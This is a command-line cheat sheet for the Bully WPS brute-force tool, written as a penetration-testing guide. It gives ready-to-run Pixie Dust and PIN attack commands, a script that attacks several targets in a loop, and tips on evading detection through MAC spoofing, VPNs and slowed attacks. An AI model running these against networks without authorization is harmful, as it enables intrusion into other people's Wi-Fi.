Bully
Bully is a WPS (Wi-Fi Protected Setup) brute-force tool designed for testing WiFi security by attempting to crack WPS PINs through dictionary attacks and exploitation of Pixie Dust vulnerabilities.
Installation
Linux/Ubuntu
# Install dependencies
sudo apt update
sudo apt install libpcap-dev
# Clone and compile from source
git clone https://github.com/aanarchyy/bully.git
cd bully/src
make
sudo make install
# Or install via package manager (if available)
sudo apt install bullyKali Linux
# Pre-installed on Kali
bully --version
# If not installed
apt-cache search bully
sudo apt install bullymacOS
# Homebrew installation
brew install bully
# From source
git clone https://github.com/aanarchyy/bully.git
cd bully/src
make
sudo cp bully /usr/local/bin/Basic Commands
| Command | Description |
|---|---|
bully -h | Display help information |
bully --version | Show version information |
bully -i wlan0 -b BSSID -c CHANNEL | Basic WPS attack |
bully -i wlan0 -b <BSSID> -c <CH> -m <MAC> | Target specific MAC address |
bully -i wlan0 -b <BSSID> -c <CH> -p <PIN> | Test specific PIN |
bully -i wlan0 -b <BSSID> -c <CH> -x | Enable verbose output |
Setup & Interface Configuration
Monitor Mode Activation
# Check available interfaces
ifconfig
iwconfig
# Put interface into monitor mode
sudo airmon-ng start wlan0
# Or using iwconfig
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# Verify monitor mode
iwconfig wlan0Finding Target Networks
# Scan for WPS-enabled networks
sudo airodump-ng wlan0mon
# Detailed WPS network scanning
sudo wash -i wlan0mon
# Filter by WPS version
sudo wash -i wlan0mon -fWPS Attack Methods
Standard PIN Brute-Force Attack
# Basic WPS PIN attack
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6
# With verbose output
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -v
# Specify starting PIN
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -p 00000000
# Custom thread count
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -n 5Pixie Dust Attack
# Pixie Dust exploitation (if vulnerable)
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -D
# With additional verbosity
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -D -v -v
# Combination with PIN brute-force
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -D -p 00000000Timeout and Retry Configuration
# Extended timeout for unresponsive targets
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 5
# Custom timeout with retry
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 3 -r 100
# Delay between attempts (milliseconds)
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -d 100Output and Logging
Capture and Logging
# Save output to file
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 | tee attack.log
# Verbose logging with timestamp
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -x -v 2>&1 | tee -a wps_attack_$(date +%Y%m%d_%H%M%S).log
# Log PIN attempts
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -v > pin_attempts.txtParsing Results
# Extract successful credentials
grep -i "wpa" attack.log
# Find discovered PINs
grep -i "pin:" attack.log
# Parse PSK/passphrase
grep -i "psk\|passphrase" attack.logAdvanced Options
MAC Address Spoofing
# Spoof MAC address to avoid detection
sudo ifconfig wlan0mon down
sudo macchanger -m AA:BB:CC:DD:EE:01 wlan0mon
sudo ifconfig wlan0mon up
# Run attack with spoofed MAC
bully -i wlan0mon -b TARGET_BSSID -c 6Multiple Target Testing
# Create target list
cat > targets.txt << EOF
AA:BB:CC:DD:EE:01 6
AA:BB:CC:DD:EE:02 11
AA:BB:CC:DD:EE:03 1
EOF
# Automated attack script
#!/bin/bash
while IFS=' ' read -r bssid channel; do
echo "[*] Attacking $bssid on channel $channel"
bully -i wlan0mon -b "$bssid" -c "$channel" -v
done < targets.txtOptimized Attack Configuration
# Fast attack (minimal waiting)
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 1 -d 50 -n 10
# Stealthy attack (slow, less detectable)
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 10 -d 1000 -n 1
# Balanced approach
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 5 -d 500 -n 5Troubleshooting & Issues
Common Problems
Issue: Interface not in monitor mode
# Check interface status
iwconfig | grep Monitor
# Properly enable monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0Issue: Connection timeout
# Increase timeout value
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -t 10
# Verify AP is reachable
sudo wash -i wlan0mon | grep AA:BB:CC:DD:EE:FFIssue: Pixie Dust not detected
# Test vulnerability with reaver
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1
# Use bully standard PIN attack instead
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6Issue: Invalid PIN format
# PIN must be 8 digits
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -p 12345678 # Valid
# Not: -p 1234567 (7 digits - invalid)Complete Workflow Example
#!/bin/bash
# Automated WPS attack workflow
TARGET_BSSID="AA:BB:CC:DD:EE:FF"
TARGET_CHANNEL="6"
INTERFACE="wlan0"
INTERFACE_MON="wlan0mon"
# 1. Setup monitor mode
echo "[*] Setting up monitor mode..."
sudo airmon-ng check kill
sudo airmon-ng start $INTERFACE
# 2. Identify targets with WPS
echo "[*] Scanning for WPS-enabled networks..."
sudo wash -i $INTERFACE_MON -a
# 3. Run WPS attack
echo "[*] Starting Bully WPS attack..."
bully -i $INTERFACE_MON -b $TARGET_BSSID -c $TARGET_CHANNEL -v
# 4. Check for result
echo "[*] Attack complete. Checking results..."
# 5. Cleanup
echo "[*] Disabling monitor mode..."
sudo airmon-ng stop $INTERFACE_MONIntegration with Other Tools
Reaver Coordination
# First try Bully Pixie Dust
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -D
# Fallback to Reaver standard attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vv
# Continue with Bully
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -vAircrack-ng Integration
# Capture WPA handshake while attacking WPS
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Run WPS attack in separate terminal
bully -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6
# Crack captured handshake if WPS fails
aircrack-ng -w wordlist.txt capture-01.capBest Practices
Operational Security
- Always obtain proper authorization before testing
- Use VPN and MAC spoofing to avoid identification
- Test during off-peak hours when possible
- Monitor for IDS/IPS detection
- Document all testing with timestamps
- Keep Bully updated for latest exploits
Legal & Ethical
- Only test networks you own or have written permission to test
- Understand local laws regarding WiFi penetration testing
- Obtain written authorization from network owner
- Follow responsible disclosure practices
- Maintain confidentiality of discovered credentials
Effectiveness Tips
- Pixie Dust works on ~30-40% of WPS-enabled APs
- Older routers more likely to be vulnerable
- Some routers have WPS lockout after failed attempts
- Building WPS PIN wordlists can speed up attacks
- Combine with deauth attacks to trigger reconnection
Performance Tuning
| Parameter | Default | Recommended | Effect |
|---|---|---|---|
| Timeout (-t) | 3 | 5-10 | Increase for distant targets |
| Delay (-d) | 0 | 500-1000 | Avoid detection/lockout |
| Threads (-n) | 1 | 5-10 | Faster testing (less stealthy) |
| Retry (-r) | 0 | 100+ | Persist through interference |
Related Tools
- Reaver - Alternative WPS cracking tool
- Wash - WPS vulnerability scanner
- Airmon-ng - Monitor mode management
- Airodump-ng - WiFi scanning
- Hashcat - Post-exploitation password cracking
Last updated: 2026-03-30 | Bully v1.4